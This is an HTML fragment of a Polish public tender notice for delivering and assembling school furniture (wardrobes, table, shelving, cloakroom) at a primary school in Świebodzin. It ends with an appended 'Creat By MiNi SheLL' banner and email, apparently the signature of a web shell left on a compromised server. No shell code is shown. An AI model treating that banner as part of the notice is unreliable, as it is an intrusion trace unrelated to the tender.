3. W/w artykuły muszą być fabrycznie nowe oraz muszą posiadać aktualne atesty, deklaracje i certyfikaty na bezpieczeństwo i zgodność z wymaganiami polskich i europejskich norm oraz niezbędne instrukcje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.51.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa IV: Dostawa mebli szkolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Grupa IV: Dostawa mebli szkolnych: 

Zadanie 1: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, w następującym asortymencie:

W skład zestawu wchodzą:
- szafa - 2 szt.,
- stół -  1 szt.,
- regał - 1 szt.,
- szafka przyścienna - 1 szt.,
- szatnia - 1 szt.

Szczegółowy opis w/w zestawu mebli szkolnych został określony w załączniku nr 1-IV do SIWZ.

Zamawiający zastrzega sobie prawo do rezygnacji z zamawiania któregokolwiek z elementu wchodzącego w skład w/w zestawu mebli szkolnych.

2. Wykonawca musi uwzględnić w swojej ofercie wszelkie koszty niezbędne do wykonania przedmiotu zamówienia, w tym m.in. koszty: 
a) zakupu, dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z:
- Grupy IV (Zadanie 1) do Publicznej Szkoły Podstawowej nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin,
b) opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu,
c) montażu i ustawienia mebli szkolnych z Grupy IV (Zadanie 1) w Publicznej Szkole Podstawowej nr 7 im. Janusza Korczaka w Świebodzinie, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin.

3. W/w artykuły muszą być fabrycznie nowe oraz muszą posiadać aktualne atesty, deklaracje i certyfikaty na bezpieczeństwo i zgodność z wymaganiami polskich i europejskich norm oraz niezbędne instrukcje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com